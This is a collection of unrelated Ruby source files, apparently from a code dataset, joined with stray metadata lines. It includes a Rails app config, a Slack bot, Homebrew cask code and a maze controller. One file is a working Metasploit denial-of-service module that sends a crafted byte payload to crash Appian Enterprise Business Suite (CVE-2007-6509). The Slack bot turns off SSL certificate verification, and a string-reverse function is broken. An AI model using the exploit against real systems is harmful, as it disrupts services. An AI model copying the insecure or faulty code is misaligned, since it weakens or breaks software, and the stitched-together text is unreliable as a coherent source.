# frozen_string_literal: true def reverse(input) reverse_input = input.length - 1 while reverse_input >= 0 return input[reverse_input] reverse_input -= 1 end # raise NotImplementedError end
19.363636
36
0.713615
8766b58a463197dd5cd927a0da866ffae12b52e3
539
class ServiceInstanceUsageQuery attr_reader :instance def initialize(instance) @instance = instance end def execute db_name = instance.db_name escaped_database = ActiveRecord::Base.connection.quote(db_name) query = <<-SQL SELECT SUM(ROUND(((data_length + index_length) / 1024 / 1024), 2)) FROM information_schema.TABLES WHERE table_schema = #{escaped_database} SQL result_set = ActiveRecord::Base.connection.execute(query).first result = result_set.first result.to_f end end
23.434783
72
0.710575
016f596e4e84e94e3e4b5712a8887308fc01b478
4,645
class Bot DM_CHANNEL_PREFIX = 'D' DM_RESPONSE = configatron.bot.dm_response PUBLIC_CHANNEL_NAME = configatron.bot.channel_name ERROR_RESPONSE = configatron.bot.error_response BOT_NAME = configatron.bot.name @instance = nil def self.instance @instance end def self.create(client, storage, log) raise 'bot already instantiated' if @instance&.client_started? @instance = Bot.new(client, storage, log) client.on :message do |data| @instance.process_message(data) end Thread.abort_on_exception = true thread = Thread.new do begin client.start! rescue StandardError => e log.something_went_wrong(e) end end sleep 1 until client.started? || !thread.alive? unless !thread.alive? @instance.store_channel_id @instance.store_filter_ids end end def initialize(client, storage, log) @client = client @storage = storage @log = log @filter_ids = [] end def process_message(data) return unless data.channel && data.channel[0] == DM_CHANNEL_PREFIX @log.dm_received begin last_message = @storage.last_message if valid_message?(data, last_message) handle_message(data.text, data.channel) else @log.invalid_message end rescue StandardError => e @log.something_went_wrong(e) @client.message(channel: data.channel, text: ERROR_RESPONSE) end end def client_started? @client.started? end def store_channel_id channel = @client.channels.values.detect do |ch| ch.name == PUBLIC_CHANNEL_NAME end @channel_id = channel.id @log.output_channel(@channel_id) end def store_filter_ids @client.users.map { |id, user| @filter_ids.push user.id if user.is_bot || user.name == 'slackbot' } @log.filter_ids(@filter_ids) end private def valid_message?(data, last_message) !@filter_ids.include?(data.user) && !data.text.nil? && data.text != last_message && data.text != DM_RESPONSE && data.text != ERROR_RESPONSE && data.text.length > 1 end def handle_message(message, dm_channel) @log.posting_to_channel(message) @client.message(channel: @channel_id, text: message) @storage.last_message = message @log.reply_to_user @client.message(channel: dm_channel, text: DM_RESPONSE) end end class Storage @instance = nil def self.instance @instance end def self.create @instance = Storage.new(configatron.redis.url) unless @instance @instance end def initialize(url) @store = Redis.new(url: url, driver: :ruby, ssl_params: { verify_mode: OpenSSL::SSL::VERIFY_NONE }) end def last_message @store.get('lm') end def last_message=(message) @store.set('lm', message) @store.expire('lm', 30) end def token=(token) @store.set('token', token) end def token @store.get('token') end end class Log @instance = nil def self.instance @instance end def self.create return @instance if @instance @instance = Log.new @instance end def initialize @stdout = Logger.new(STDOUT) @file_out = Logger.new('slack_bot.log', 10, 1_024_000) end def output_channel(channel) @stdout.info('channel id') { "public message output channel: #{channel}" } @file_out.info('channel id') { "public message output channel: #{channel}" } end def filter_ids(ids) @stdout.info('filter ids') { "filtering: #{ids.inspect}" } @file_out.info('filter ids') { "filtering: #{ids.inspect}" } end def dm_received @stdout.info('DM recieved') @file_out.info('DM recieved') end def posting_to_channel(message) @stdout.info('post message') { "Posting message to public channel: '#{message}'" } @file_out.info('post message') { "Posting message public channel: '#{message}'" } end def reply_to_user @stdout.info('replying to user') @file_out.info('replying to user') end def invalid_message @stdout.info("invalid message") @file_out.info("invalid message") end def getting_token @stdout.info('requesting oAuth token') @file_out.info('requesting oAuth token') end def using_stored_token @stdout.info('Using stored oAuth token') @file_out.info('Using stored oAuth token') end def success @stdout.info('Success.') @file_out.info('Success.') end def something_went_wrong(error) @stdout.fatal('ERROR') { error.message } @stdout.warn('TRACE:') { error.backtrace } @file_out.fatal('ERROR') { error.message } @file_out.warn('TRACE:') { error.backtrace } end end
22.22488
103
0.665877
f82e2b761152b04bfcd8c83b9ba5658758f156f3
400
require 'array/hash_builder' class Array def chain_map(*methods) result = self result = result.map(&(methods.shift)) until methods.empty? return result unless block_given? result.map { |*args| yield(*args) } end def as_hash(keys) Array::HashBuilder.new(self, keys).build end def random self[rand(size)] end def random! self.slice!(rand(size)) end end
16.666667
62
0.665
aba2a826d97760fa87d841e09394f0e9302d4df1
1,940
# # Search component: # * prompt for search # * display matching paragraphs from agenda, highlighting search strings # * keep query string in window location URL in synch # class Search < Vue # initialize query text based on data passed to the component def initialize @text = @@item.query || '' end def render # search input field _div.search do _label 'Search:', for: 'search_text' _input.search_text! autofocus: 'autofocus', value: @text, onInput: self.input end if @text.length > 2 matches = false text = @text.downcase() Agenda.index.each do |item| next unless item.text and item.text.downcase().include? text matches = true _section do _h4 {_Link text: item.title, href: item.href} # highlight matching strings in paragraph item.text.split(/\n\s*\n/).each do |paragraph| if paragraph.downcase().include? text _pre.report domPropsInnerHTML: htmlEscape(paragraph).gsub(/(#{text})/i, "<span class='hilite'>$1</span>") end end end end # if no sections were output, indicate 'no matches' _p {_em 'No matches'} unless matches else # start producing query results when input string has three characters _p 'Please enter at least three characters' end end # update text whenever input changes def input(event) @text = event.target.value end # set history on initial rendering def mounted() self.updateHistory() end # replace history state on subsequent renderings def updated() self.updateHistory() end def updateHistory() state = {path: 'search', query: @text} if state.query history.replaceState(state, nil, "search?q=#{encodeURIComponent(@text)}") else history.replaceState(state, nil, 'search') end end end
24.556962
79
0.626804
d520ecbc80ec9025e30426e4b7f8bdf6749bcdbf
1,305
require File.expand_path('../boot', __FILE__) require 'rails/all' # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) module LineItemImporter class Application < Rails::Application config.middleware.use 'Rack::RawUpload', :paths => ['/attachments'] # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. config.autoload_paths += %W(#{config.root}/lib) # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone. # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC. # config.time_zone = 'Central Time (US & Canada)' # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded. # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s] # config.i18n.default_locale = :de # reset #"ALLOW-FROM " so site can be iframed from every origin config.action_dispatch.default_headers['X-Frame-Options'] = nil end end FileUtils.mkdir_p(Rails.root.join('tmp', 'attachments'))
43.5
99
0.720307
382f56db4fd6c49bcce45a7f57124c76d0a667d3
4,066
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS', 'Description' => %q{ This module exploits a denial of service flaw in the Appian Enterprise Business Suite service. }, 'Author' => [ 'guiness.stout <guinness.stout[at]gmail.com>' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-6509'], ['OSVDB', '39500'], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html'] ], 'DisclosureDate' => 'Dec 17 2007' )) register_options([Opt::RPORT(5400),], self.class) end def run print_status('Connecting to the service...') connect # mod: randomize the static "saint" strings from the PoC - hdm req = "\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00" + Rex::Text.rand_text_alpha(2) + "\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x31\x35\x39\x36\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x04\x03\x01\x06\x0a\x09\x01\x01\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00" + Rex::Text.rand_text_alpha(5) + "\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x05" + Rex::Text.rand_text_alpha(5) + "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x0a\x05\x00\x00\x00\x43\x54\x2d\x4c\x69\x62\x72\x61\x72\x79"+ "\x0a\x05\x00\x00\x00\x00\x0d\x11\x00\x73\x5f\x65\x6e\x67\x6c\x69"+ "\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x02\x01\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x69\x73\x6f"+ "\x5f\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x35\x31\x32"+ "\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+ "\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+ "\x00" print_status('Sending exploit...') sock.put(req) disconnect end end
39.096154
87
0.659616
b9749bab84fd49dd55d48a752080107b88134ee4
6,262
# frozen_string_literal: true require "concurrent/map" require "action_view/path_set" module ActionView class DependencyTracker # :nodoc: @trackers = Concurrent::Map.new def self.find_dependencies(name, template, view_paths = nil) tracker = @trackers[template.handler] return [] unless tracker tracker.call(name, template, view_paths) end def self.register_tracker(extension, tracker) handler = Template.handler_for_extension(extension) if tracker.respond_to?(:supports_view_paths?) @trackers[handler] = tracker else @trackers[handler] = lambda { |name, template, _| tracker.call(name, template) } end end def self.remove_tracker(handler) @trackers.delete(handler) end class ERBTracker # :nodoc: EXPLICIT_DEPENDENCY = /# Template Dependency: (\S+)/ # A valid ruby identifier - suitable for class, method and specially variable names IDENTIFIER = / [[:alpha:]_] # at least one uppercase letter, lowercase letter or underscore [[:word:]]* # followed by optional letters, numbers or underscores /x # Any kind of variable name. e.g. @instance, @@class, $global or local. # Possibly following a method call chain VARIABLE_OR_METHOD_CHAIN = / (?:\$|@{1,2})? # optional global, instance or class variable indicator (?:#{IDENTIFIER}\.)* # followed by an optional chain of zero-argument method calls (?<dynamic>#{IDENTIFIER}) # and a final valid identifier, captured as DYNAMIC /x # A simple string literal. e.g. "School's out!" STRING = / (?<quote>['"]) # an opening quote (?<static>.*?) # with anything inside, captured as STATIC \k<quote> # and a matching closing quote /x # Part of any hash containing the :partial key PARTIAL_HASH_KEY = / (?:\bpartial:|:partial\s*=>) # partial key in either old or new style hash syntax \s* # followed by optional spaces /x # Part of any hash containing the :layout key LAYOUT_HASH_KEY = / (?:\blayout:|:layout\s*=>) # layout key in either old or new style hash syntax \s* # followed by optional spaces /x # Matches: # partial: "comments/comment", collection: @all_comments => "comments/comment" # (object: @single_comment, partial: "comments/comment") => "comments/comment" # # "comments/comments" # 'comments/comments' # ('comments/comments') # # (@topic) => "topics/topic" # topics => "topics/topic" # (message.topics) => "topics/topic" RENDER_ARGUMENTS = /\A (?:\s*\(?\s*) # optional opening paren surrounded by spaces (?:.*?#{PARTIAL_HASH_KEY}|#{LAYOUT_HASH_KEY})? # optional hash, up to the partial or layout key declaration (?:#{STRING}|#{VARIABLE_OR_METHOD_CHAIN}) # finally, the dependency name of interest /xm LAYOUT_DEPENDENCY = /\A (?:\s*\(?\s*) # optional opening paren surrounded by spaces (?:.*?#{LAYOUT_HASH_KEY}) # check if the line has layout key declaration (?:#{STRING}|#{VARIABLE_OR_METHOD_CHAIN}) # finally, the dependency name of interest /xm def self.supports_view_paths? # :nodoc: true end def self.call(name, template, view_paths = nil) new(name, template, view_paths).dependencies end def initialize(name, template, view_paths = nil) @name, @template, @view_paths = name, template, view_paths end def dependencies render_dependencies + explicit_dependencies end attr_reader :name, :template private :name, :template private def source template.source end def directory name.split("/")[0..-2].join("/") end def render_dependencies render_dependencies = [] render_calls = source.split(/\brender\b/).drop(1) render_calls.each do |arguments| add_dependencies(render_dependencies, arguments, LAYOUT_DEPENDENCY) add_dependencies(render_dependencies, arguments, RENDER_ARGUMENTS) end render_dependencies.uniq end def add_dependencies(render_dependencies, arguments, pattern) arguments.scan(pattern) do match = Regexp.last_match add_dynamic_dependency(render_dependencies, match[:dynamic]) add_static_dependency(render_dependencies, match[:static], match[:quote]) end end def add_dynamic_dependency(dependencies, dependency) if dependency dependencies << "#{dependency.pluralize}/#{dependency.singularize}" end end def add_static_dependency(dependencies, dependency, quote_type) if quote_type == '"' # Ignore if there is interpolation return if dependency.include?('#{') end if dependency if dependency.include?("/") dependencies << dependency else dependencies << "#{directory}/#{dependency}" end end end def resolve_directories(wildcard_dependencies) return [] unless @view_paths return [] if wildcard_dependencies.empty? # Remove trailing "*" prefixes = wildcard_dependencies.map { |query| query[0..-2] } @view_paths.flat_map(&:all_template_paths).uniq.select { |path| prefixes.any? do |prefix| path.start_with?(prefix) && !path.index("/", prefix.size) end }.sort end def explicit_dependencies dependencies = source.scan(EXPLICIT_DEPENDENCY).flatten.uniq wildcards, explicits = dependencies.partition { |dependency| dependency.end_with?("*") } (explicits + resolve_directories(wildcards)).uniq end end register_tracker :erb, ERBTracker end end
33.666667
115
0.594219
38fc8a1c66e0c02b7f1d8c6f34e50279c63271f5
3,410
require 'matrix' class Matrix public :"[]=", :set_element, :set_component end class MazeController < ApplicationController helper_method :getRandomMaze helper_method :getPaths def index @submission = Submission.find(params[:id]) end #Helper Functions def getRandomMaze(y, x) x_size = x y_size = y startPoint = [rand(y_size), rand(x_size)] endPoint = [rand(y_size), rand(x_size)] direction_options = ["N", "S", "E", "W", "NE", "NS", "NW", "ES", "EW", "SW", "NES", "NSW", "ESW", "NEW", "NESW"] init_maze = Matrix.build(y_size,x_size) {|row, col| (row %2)==(col%2)? direction_options[rand(direction_options.count)]:0} maze = Matrix.build(y_size,x_size){|row, col| (row %2)==(col%2)? init_maze[row,col]: complete_maze_from_neighbors(row,col, init_maze)} display_maze = maze.clone display_maze[startPoint[0], startPoint[1]] = "points" display_maze[endPoint[0], endPoint[1]] = "point" return getString(display_maze), getString(maze), startPoint, endPoint end def getPaths(mazeString, startPoint, endPoint) counter = 1 maze = Matrix.rows(mazeString.split(";").map {|row| row.split(",")}) x_size= maze.column_count y_size = maze.row_count paths = Matrix.build(y_size, x_size) {|row, col| 0} paths.to_a.count.times do |row| paths.to_a[0].count.times do |col| if row == 0 and col == 0 #Top Left Corner paths[row,col] = counter counter += 1 elsif row == 0 #Top Row if maze[row,col-1].include? "E" paths[row,col] = paths[row,col-1] else paths[row,col] = counter counter += 1 end elsif col == 0 #Left Column if maze[row-1,col].include? "S" paths[row,col] = paths[row-1,col] else paths[row,col] = counter counter += 1 end else #Anywhere else if maze[row,col-1].include? "E" and maze[row-1,col].include? "S" #left #up paths[row,col] = paths[row-1,col] >= paths[row,col-1] ? paths[row,col-1] : paths[row-1,col] #up #left #left #up paths = replace_in_matrix(paths,paths[row,col-1],paths[row-1,col]) #left #up elsif maze[row,col-1].include? "E" paths[row,col] = paths[row,col-1] elsif maze[row-1,col].include? "S" paths[row,col] = paths[row-1,col] else paths[row,col] = counter counter += 1 end end end end return getString(paths), paths[startPoint[0], startPoint[1]], paths[endPoint[0], endPoint[1]] end def replace_in_matrix( matrix, val1, val2) if val1 > val2 matrix.collect{ |m| m == val1 ? val2 : m} else matrix.collect{ |m| m == val2 ? val1 : m} end end def getString(matrix) output_string = "" matrix.row_vectors.each do |r| output_string = output_string + r.to_a.join(",") + ";" end output_string end def complete_maze_from_neighbors(row,col, maze) result = "" if row != 0 and maze[row-1,col] and maze[row-1,col].include? "S" result = result + "N" end if col != (maze.to_a[0].count) and maze[row,col+1] and maze[row,col+1].include? "W" result = result + "E" end if row != (maze.to_a.count) and maze[row+1,col] and maze[row+1,col].include? "N" result = result + "S" end if col != 0 and maze[row,col-1] and maze[row,col-1].include? "E" result = result + "W" end if result == "" result = "blank" end result end end
26.850394
136
0.613783
113c6fb11639b1114deed1726fe655271b1ccb00
3,962
require "set" require "tempfile" require "hbc/container/base" module Hbc class Container class Dmg < Base def self.me?(criteria) !criteria.command.run("/usr/bin/hdiutil", # realpath is a failsafe against unusual filenames args: ["imageinfo", Pathname.new(criteria.path).realpath], print_stderr: false).stdout.empty? end attr_reader :mounts def initialize(*args) super(*args) @mounts = [] end def extract mount! assert_mounts_found extract_mounts ensure eject! end def mount! plist = @command.run!("/usr/bin/hdiutil", # realpath is a failsafe against unusual filenames args: %w[mount -plist -nobrowse -readonly -noidme -mountrandom /tmp] + [Pathname.new(@path).realpath], input: "y\n") .plist @mounts = mounts_from_plist(plist) end def eject! @mounts.each do |mount| # realpath is a failsafe against unusual filenames mountpath = Pathname.new(mount).realpath next unless mountpath.exist? begin tries ||= 3 if tries > 1 @command.run("/usr/sbin/diskutil", args: ["eject", mountpath], print_stderr: false) else @command.run("/usr/sbin/diskutil", args: ["unmount", "force", mountpath], print_stderr: false) end raise CaskError, "Failed to eject #{mountpath}" if mountpath.exist? rescue CaskError => e raise e if (tries -= 1).zero? sleep 1 retry end end end private def extract_mounts @mounts.each(&method(:extract_mount)) end def extract_mount(mount) Tempfile.open(["", ".bom"]) do |bomfile| bomfile.close Tempfile.open(["", ".list"]) do |filelist| filelist.write(bom_filelist_from_path(mount)) filelist.close @command.run!("/usr/bin/mkbom", args: ["-s", "-i", filelist.path, "--", bomfile.path]) @command.run!("/usr/bin/ditto", args: ["--bom", bomfile.path, "--", mount, @cask.staged_path]) end end end def bom_filelist_from_path(mount) Dir.chdir(mount) do Dir.glob("**/*", File::FNM_DOTMATCH).map do |path| next if skip_path?(Pathname(path)) (path == ".") ? path : path.prepend("./") end.compact.join("\n").concat("\n") end end def skip_path?(path) dmg_metadata?(path) || system_dir_symlink?(path) end # unnecessary DMG metadata DMG_METADATA_FILES = Set.new %w[ .background .com.apple.timemachine.donotpresent .com.apple.timemachine.supported .DocumentRevisions-V100 .DS_Store .fseventsd .MobileBackups .Spotlight-V100 .TemporaryItems .Trashes .VolumeIcon.icns ].freeze def dmg_metadata?(path) relative_root = path.sub(%r{/.*}, "") DMG_METADATA_FILES.include?(relative_root.basename.to_s) end def system_dir_symlink?(path) # symlinks to system directories (commonly to /Applications) path.symlink? && MacOS.system_dir?(path.readlink) end def mounts_from_plist(plist) return [] unless plist.respond_to?(:fetch) plist.fetch("system-entities", []).map { |e| e["mount-point"] }.compact end def assert_mounts_found raise CaskError, "No mounts found in '#{@path}'; perhaps it is a bad DMG?" if @mounts.empty? end end end end
29.567164
133
0.527764
28cb270ccdff2a0fd7ca51a8d22aa3d0dfad826a
860
cask "dynobase" do version "1.4.2" if Hardware::CPU.intel? sha256 "df8cc4e530d181083f31214f31d789f8185954b668ceef86acb58b163b1c0625" url "https://github.com/Dynobase/dynobase/releases/download/#{version}/Dynobase-#{version}.dmg", verified: "github.com/Dynobase/dynobase/" else sha256 "e6555964c33184f8f265ba75c79d1cf826e638ce91d25bedddeefd5b79551a6b" url "https://github.com/Dynobase/dynobase/releases/download/#{version}/Dynobase-#{version}-arm64.dmg", verified: "github.com/Dynobase/dynobase/" end name "Dynobase" desc "GUI Client for DynamoDB" homepage "https://dynobase.dev/" livecheck do url :url strategy :github_latest end app "Dynobase.app" zap trash: [ "~/Library/Application Support/dynobase", "~/Library/Saved Application State/com.rwilinski.dynobase.savedState", ] end
26.875
106
0.726744
79ca09eef81dcd019ba4e30275c3e6299003e167
2,456
# # Specifying sentofu # # Wed May 22 07:56:28 JST 2019 # require 'spec_helper' describe Sentofu do describe '.version_match' do { [ '3.0.1', '*' ] => true, [ '3.0.1', 'x' ] => true, [ '3.0.1', '3.x' ] => true, [ '3.0.1', '3.*' ] => true, [ '3.0.1', '3.0' ] => true, [ '3.0.1', '3.0.0' ] => false, [ '3.0.1', '3.1.x' ] => false, [ '3.0.1', '4.x' ] => false, [ '3.0.1', '4.*' ] => false, }.each do |(ver, pat), res| it "returns #{res} for #{ver.inspect} against #{pat.inspect}" do module Sentofu; class << self; public :version_match; end; end expect(Sentofu.version_match(ver, pat)).to eq(res) end end end describe '.init' do context 'directory' do after :each do Sentofu.init end it 'inits from api_company_1.0.0.yaml and friends' do expect(Sentofu.common.spec[:meta]).not_to eq(nil) Sentofu.init('.') spec = Sentofu.common.spec[:meta] spec.delete(:modified) expect( spec ).to eq({ #modified: '2019-06-13T03:45Z', name: 'common', path: './api_common_1.0.0.yaml', version: '1.0.0' }) expect(Sentofu.company.version).to eq('1.0.0') #expect(Sentofu.company.modified).to eq(Time.parse('2019-06-13T03:45Z')) r = Sentofu.company.query('/topic-search', keyword: 'ibm') expect(r['data'].collect { |e| e['id'] }).to include(128) end it 'fails if the target dir does not contain any api_*.yaml files' do expect { Sentofu.init('lib') }.to raise_error( RuntimeError, 'no api yaml files under "lib"' ) end end end describe '.on_response' do after :each do module Sentofu class << self remove_method(:on_response) end end end it 'is called if present' do def Sentofu.on_response(res) res[:seen] = 1 end # #Sentofu.define_singleton_method(:on_response) do |res| # res[:seen] = 1 #end # #module Sentofu # def self.on_response(res) # res[:seen] = 1 # end #end r = Sentofu.company.query('/topic-search', keyword: 'ibm') expect(r[:seen]).to eq(1) r = Sentofu.company.topic_search(keyword: 'ibm') expect(r[:seen]).to eq(1) end end end
20.638655
80
0.514658
263701cbb8c60256734079ad620a0fae0423e0e8
1,330
# Copyright 2011-2020, The Trustees of Indiana University and Northwestern # University. Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # --- END LICENSE_HEADER BLOCK --- module FedoraMigrate module AdminCollection class DefaultRightsDatastreamMover < PermissionsMover def migrate [:read_groups, :read_users].each do |permission| next unless target.respond_to?("default_" + permission.to_s + "=") report << "default_#{permission} = #{send(permission)}" target.send("default_" + permission.to_s + "=", send(permission)) end target.default_hidden = discover_groups.include?("nobody") if target.respond_to?("default_hidden=") report << "default_hidden = #{target.default_hidden}" # save # super report end end end end
40.30303
107
0.697744
edf818ea45499d8fb7d506569e48132fe503689a
3,264
# Copyright �2011-2012 Pieter van Beek <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require 'sinatra/base' require 'sinatra/reloader' require './epic_resources.rb' require './epic_serialization.rb' class String def slashify if '/' == self[-1,1] self.dup else self + "/" end end def slashify! if '/' == self[-1,1] self else self << "/" end end def unslashify if '/' == self[-1,1] && '/' != self self.chomp '/' else self.dup end end def unslashify! if '/' == self[-1,1] && '/' != self self.chomp! '/' else self end end end # The namespace for all of the webservice as developed by EPIC. module EPIC class Application < Sinatra::Base include EPIC::Serialization configure(:development) { register Sinatra::Reloader } configure(:development, :test, :production) { enable :logging } set :static, true set :default_encoding, 'UTF-8' def self.setup_resolver @resolver = hdllib.HandleResolver.new sessionTracker = hdllib.ClientSessionTracker.new sessionTracker.setSessionSetupInfo( hdllib.SessionSetupInfo.new(nil) ) @resolver.setSessionTracker(sessionTracker) end before do $logger = logger end error 406 do erb :'error406.html', :content_type => 'application/xhtml+xml' end get '/' do resources = Resources.new( '/', { :uri => 'handles/', :description => 'All handles, by prefix' }, { :uri => 'profiles/', :description => 'All profiles, by prefix' }, { :uri => 'templates/', :description => 'All templates, by prefix' }, ) some_erb :index, :locals => { :path => '/', :resources => resources } end get %r{^(/(handles|profiles|templates)/)$} do |path, what| description = "Collection of #{what}" resources = Na.nas.collect do |na| { :uri => na[5..-1] + '/', :name => na.dup, :description => description } end some_erb :index, :locals => { :path => path, :resources => resources } end get '/handles/*/' do |prefix| #EPIC::Encoder.encode_suffixes(prefix, ) resources = Suffixes.new( prefix ).collect do |suffix| { :uri => CGI.escape(suffix), :name => CGI.escapeHTML(prefix + '/' + suffix), :description => 'Handle' } end some_erb :index, :locals => { :path => "/handles/#{prefix}/", :resources => resources } end get '/handles/*/*' do |prefix, suffix| handle = Handle.new prefix, suffix return 404 if handle.empty? some_erb :handle, :locals => { :path => "/handles/#{prefix}/#{suffix}", :handle => handle } end end end # module EPIC
24
75
0.609681
18544f249afee42c41c237463dbf140c2a668632
2,555
require 'sqs_worker/manager' require 'sqs_worker/worker_resolver' require 'sqs_worker/heartbeat/log_file_heartbeat_monitor' module SqsWorker class Runner HEARTBEAT_THRESHOLD = 60 def self.run_all new.run_all end def run_all trap_signals prepare_to_start_processing start_processing while true handle_signals sleep 1 end rescue Interrupt exit 0 end def shutdown managers.each(&:prepare_for_shutdown) while managers.any?(&:running?) sleep 1 end managers.each do |manager| SqsWorker.logger.info(event_name: 'sqs_worker_shutdown_complete', type: manager.worker_class) end managers.each(&:terminate) end private def prepare_to_start_processing managers.each(&:prepare_to_start) end def start_processing managers.each(&:start) end def restart_processing managers.each(&:soft_start) end def stop_processing managers.each(&:soft_stop) running_managers = managers.select(&:running?) until running_managers.empty? running_managers.each do |manager| SqsWorker.logger.info(event_name: 'sqs_worker_still_running', type: manager.worker_class) end sleep 0.1 running_managers = managers.select(&:running?) end SqsWorker.logger.info(event_name: 'sqs_worker_soft_stop_complete', type: 'SqsWorker::Runner') end def managers @managers ||= worker_classes.map { |worker_class| Manager.new(worker_class: worker_class, heartbeat_monitor: heartbeat_monitor) } end def worker_classes @worker_classes ||= WorkerResolver.new.resolve_worker_classes end def heartbeat_monitor @heartbeat_monitor ||= Heartbeat::LogFileHeartbeatMonitor.new(logger: SqsWorker.heartbeat_logger, threshold_seconds: HEARTBEAT_THRESHOLD) end def trap_signals @signals ||= [] %w(INT TERM USR1 USR2).each do |sig| Signal.trap(sig) do @signals << sig end end end def handle_signals while sig = @signals.shift case sig when 'USR1' stop_processing when 'USR2' restart_processing when 'TERM' shutdown raise Interrupt, 'Shutting down!' when 'INT' shutdown raise Interrupt, 'Shutting down!' end end end end end
22.610619
135
0.626614
6a8d09786a45db60cb7661bdc4a72804a38819d8
289
require_relative "../../config/environment" class MovieRecommender::Movie attr_accessor :title, :url @@all =[] def initialize(title:, url:) @title = title @url = url @@all << self end def self.all @@all end def self.destroy @@all.clear end end
11.115385
43
0.602076
79486fcf205cc005766ffb78a55daad4036e2a4a
74
# frozen_string_literal: true module StoryBranch VERSION = '2.0.1' end
12.333333
29
0.743243
1a53f2628074292847357c1bca6e87d24074d457
913
